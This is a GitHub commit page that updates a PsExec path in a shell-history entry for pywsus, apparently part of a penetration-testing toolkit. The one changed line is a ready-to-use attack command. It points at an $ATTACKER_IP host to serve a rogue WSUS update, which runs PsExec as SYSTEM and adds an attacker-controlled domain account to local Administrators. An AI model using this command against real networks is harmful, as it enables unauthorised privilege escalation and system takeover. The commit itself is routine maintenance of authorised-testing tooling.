Skip to content

Commit

Permalink
Fix pywsus history command
Browse files Browse the repository at this point in the history
The Sysinternals folder has been has been moved from /opt/resources/windows/sysinternals/ to /opt/resources/windows/SysinternalsSuite/.
This commit reflects this change in the history file of the pywsus tool.
  • Loading branch information
Mathisca authored Mar 2, 2023
1 parent a93d3b1 commit 6803c37
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion sources/zsh/history.d/pywsus
Original file line number Diff line number Diff line change
@@ -1 +1 @@
pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'
pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/SysinternalsSuite/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'

0 comments on commit 6803c37

Please sign in to comment.